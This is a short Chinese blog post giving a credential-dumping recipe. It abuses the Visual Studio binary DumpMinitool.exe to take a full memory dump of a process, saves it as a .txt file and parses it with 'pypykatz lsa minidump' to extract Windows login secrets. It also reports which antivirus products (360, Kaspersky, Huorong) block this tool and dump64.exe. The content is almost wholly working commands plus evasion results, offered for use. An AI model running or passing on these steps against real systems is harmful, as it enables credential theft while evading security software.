DumpMinitool.exe
经测试,360 和卡巴拦截,火绒正常
Visual Studio 2022 的一个程序,使用这个需要安装扩展开发
C:Program FilesMicrosoft Visual Studio2022CommunityCommon7IDEExtensionsTestPlatformExtensionsDumpMinitool.exe
使用命令
DumpMinitool.exe --file c:userspublictest.txt --processId PID --dumpType Full
# 读取
pip install pypykatz
pypykatz lsa minidump 111.txt
360 拦截
卡巴斯基拦截
火绒不拦截
dump64.exe
卡巴斯基拦截,火绒和 360 不拦截
360 不拦截
火绒不拦截
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容